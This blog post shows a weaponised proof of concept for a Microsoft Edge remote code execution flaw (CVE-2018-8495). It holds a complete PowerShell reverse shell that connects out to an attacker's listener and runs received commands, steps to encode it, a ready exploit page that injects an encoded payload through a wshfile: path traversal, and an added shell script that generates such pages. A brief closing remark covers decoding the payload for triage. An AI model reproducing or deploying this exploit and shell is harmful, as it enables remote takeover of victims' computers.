21 October 2018, Alberto

Microsoft Edge RCE – CVE-2018-8495


A PoC that runs a PowerShell reverse shell, built on the author's PoC (https://leucosite.com/Microsoft-Edge-RCE/) for the RCE vulnerability in Microsoft Edge (CVE-2018-8495, fixed in Microsoft's October 2018 security updates). The original PoC only launches the calculator; here the injected command is replaced with an encoded PowerShell payload that connects back to a listener.

First we need a PowerShell script that opens a socket back to our listener (replace x.x.x.x and 8080 with the listener's address and port) and executes whatever is typed on it, one command per line, until "exit" is received:

# Connect back to the listener; bail out if the connection fails.
$socket = New-Object System.Net.Sockets.TcpClient('x.x.x.x', 8080);
if ($socket -eq $null) { exit 1 }
$stream = $socket.GetStream();
$writer = New-Object System.IO.StreamWriter($stream);
$buffer = New-Object System.Byte[] 1024;
$encoding = New-Object System.Text.AsciiEncoding;
do {
    # Send a prompt, then block until the listener sends a line.
    $writer.Write("BertoShell> "); $writer.Flush();
    $read = $null;
    while ($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null) {}
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n", "").Replace("`n", "");
    if (!$out.Equals("exit")) {
        # First token is the command, the remaining tokens its arguments; return the output.
        $out = $out.Split(' ');
        $res = [string](& $out[0] $out[1..$out.Length]);
        if ($res -ne $null) { $writer.WriteLine($res) }
    }
} while (!$out.Equals("exit"));
$writer.Close(); $socket.Close();

We encode it as UTF-16LE and then base64, which is the format `powershell -enc` (`-EncodedCommand`) expects. `-w0` stops GNU `base64` from wrapping its output at 76 columns, which would break the single-line URL we paste it into:

user@kali1:~$ iconv -f UTF-8 -t UTF-16LE ~/shellcode.txt | base64 -w0

Then we replace the call to the calculator in the author's PoC with the call to our PowerShell shell. The `wshfile:` URI is handed to the Windows Script Host, the `../..` traversal reaches SyncAppvPublishingServer.vbs in System32, and the closing quote plus `;powershell ...;` injects our command into the PowerShell invocation that the script builds from its arguments. As in the author's PoC, the click on the link is fired by the first keypress, after which the handler is removed:

<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc JABzAG8AYwBrAGUAdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQA5ADQALgA0ADUALgAxADYAOAAnACwAIAA4ADAAOAAwACkAOwBpAGYAKAAkAHMAbwBjAGsAZQB0ACAALQBlAHEAIAAkAG4AdQBsAGwAKQB7AGUAeABpAHQAIAAxAH0AJABzAHQAcgBlAGEAbQAgAD0AIAAkAHMAbwBjAGsAZQB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7ACQAYgB1AGYAZgBlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcAOwBkAG8AewAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAIgBCAGUAcgB0AG8AUwBoAGUAbABsAD4AIAAiACkAOwAkAHcAcgBpAHQAZQByAC4ARgBsAHUAcwBoACgAKQA7ACQAcgBlAGEAZAAgAD0AIAAkAG4AdQBsAGwAOwB3AGgAaQBsAGUAKAAkAHMAdAByAGUAYQBtAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQAgAC0AbwByACAAKAAkAHIAZQBhAGQAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAMQAwADIANAApACkAIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAfQAkAG8AdQB0ACAAPQAgACQAZQBuAGMAbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAJAByAGUAYQBkACkALgBSAGUAcABsAGEAYwBlACgAIgBgAHIAYABuACIALAAiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAGAAbgAiACwAIgAiACkAOwBpAGYAKAAhACQAbwB1AHQALgBlAHEAdQBhAGwAcwAoACIAZQB4AGkAdAAiACkAKQB7ACQAbwB1AHQAIAA9ACAAJABvAHUAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAOwAkAHIAZQBzACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACYAJABvAHUAdABbADAAXQAgACQAbwB1AHQAWwAxAC4ALgAkAG8AdQB0AC4AbABlAG4AZwB0AGgAXQApADsAaQBmACgAJAByAGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAgACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUATABpAG4AZQAoACQAcgBlAHMAKQB9AH0AfQBXAGgAaQBsAGUAIAAoACEAJABvAHUAdAAuAGUAcQB1AGEAbABzACgAIgBlAHgAaQB0ACIAKQApACQAdwByAGkAdABlAHIALgBjAGwAbwBzAGUAKAApADsAJABzAG8AYwBrAGUAdAAuAGMAbABvAHMAZQAoACkAOwA=;"'>test</a>
<script>
// The navigation needs a user gesture: trigger the click on the first keypress,
// and drop the handler so it only fires once.
window.onkeydown=e=>{
window.onkeydown=z={};
q.click()
}
</script>
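The two manual steps above (encoding the script for `-enc`, then pasting the blob into the PoC href) are easy to get wrong: a wrapped base64 line or a UTF-8 instead of UTF-16LE encoding yields a payload PowerShell silently rejects. The following shell helpers, added here as an example and not part of the original post, do the conversion in one place, emit the finished PoC page, and decode a blob back to its script. They assume GNU coreutils `base64` (for `-w0`) and glibc `iconv`; the listener address inside the script you pass is yours to supply, and the sample payload at the bottom is constructed for offline testing.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes GNU base64 and glibc iconv.
set -eu

# PowerShell's -EncodedCommand expects base64 over the UTF-16LE bytes of the script.
# -w0 prevents GNU base64 from wrapping at 76 columns, which would corrupt the URL.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
}

# Reverse of ps_encode: recover the script from a blob. Handy when triaging a
# "powershell -enc ..." command line seen in process-creation logs.
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Emit the PoC page: the author's SyncAppvPublishingServer.vbs injection with the
# encoded command where the original had "calc". $1 is the PowerShell to run.
build_poc_html() {
    enc=$(ps_encode "$1")
    cat <<EOF
<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc ${enc};"'>test</a>
<script>
window.onkeydown=e=>{
window.onkeydown=z={};
q.click()
}
</script>
EOF
}

# Constructed sample payload (harmless) so the round trip can be checked offline.
SAMPLE_PS='Start-Process calc'

# Usage: build_poc_html "$(cat ~/shellcode.txt)" > poc.html
# Sanity check: the blob must decode back to the exact script that was encoded.
[ "$(ps_decode "$(ps_encode "$SAMPLE_PS")")" = "$SAMPLE_PS" ] || { echo 'round trip failed' >&2; exit 1; }
```

Feeding the post's own blob to `ps_decode` is a quick way to confirm what a page like this one would actually execute; the same one-liner is what a defender would run on the `-enc` argument of a suspicious `powershell.exe` child of `wscript.exe`.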
 